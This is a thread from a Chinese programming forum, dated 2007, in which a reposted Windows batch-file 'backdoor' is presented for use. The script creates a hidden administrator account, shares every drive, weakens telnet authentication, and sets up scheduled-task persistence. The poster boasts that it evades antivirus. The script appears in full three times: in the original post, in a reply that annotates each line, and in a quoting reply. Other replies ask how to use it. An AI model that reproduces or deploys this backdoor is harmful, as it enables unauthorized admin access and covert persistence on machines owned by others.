注册 登录
编程论坛 Windows论坛

[转载]用批处理写的后门

WSY379 发布于 2007-09-13 22:50, 2467 次点击

代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
可惜这个批处理不能用在Windows Vista的系统上和Windows Server Edition 2003上 可惜,实在是可惜!
虽然在Windows Server Edition 2003下在改一下路径是可以实现后门功能,但在Windows Vista下就用不了了,真是可惜!

9 回复
#2
cnenc2007-09-17 16:47
开telnet服务?
#3
redice2007-09-28 22:55

@echo off
@attrib +s + r xyt.bat '将xyt.bat文件设置为 “只读+系统” 属性
@net user xyt hacker /add
@net localgroup administrators xyt /add ‘前面两句 添加一个名字为hacker的用户 并添加到管理员组
@net share c$=c: @net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h: ’共享 c,d,e,f,g,g盘
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule ‘前两句 重启 “计划任务”服务
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet ’前两句:重启telnet服务
@exit

#4
lthiy2007-09-29 12:48
看看
呵呵
#5
czjt12342007-09-30 06:55
以下是引用WSY379在2007-9-13 22:50:16的发言:

代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
可惜这个批处理不能用在Windows Vista的系统上和Windows Server Edition 2003上 可惜,实在是可惜!
虽然在Windows Server Edition 2003下在改一下路径是可以实现后门功能,但在Windows Vista下就用不了了,真是可惜!

只有第一行要@

后面的每行开头的@都可以删掉

#6
guotaolovewen2008-03-01 12:20
用什么语言编写
用什么语言编写的
#7
absentlyh2008-05-27 13:30
这个后门怎么用
#8
vfdff2008-06-06 18:24
回复 5# czjt1234 的帖子
可以删除的意思 就是也可以保留
#9
cosdos2008-06-18 01:48
[bo][un]guotaolovewen[/un] 在 2008-3-1 12:20 的发言:[/bo]

用什么语言编写的



批处理脚本文件

命令
#10
jxyga1112008-06-20 08:48
你们怎么这么懂脚本啊可否教一下
1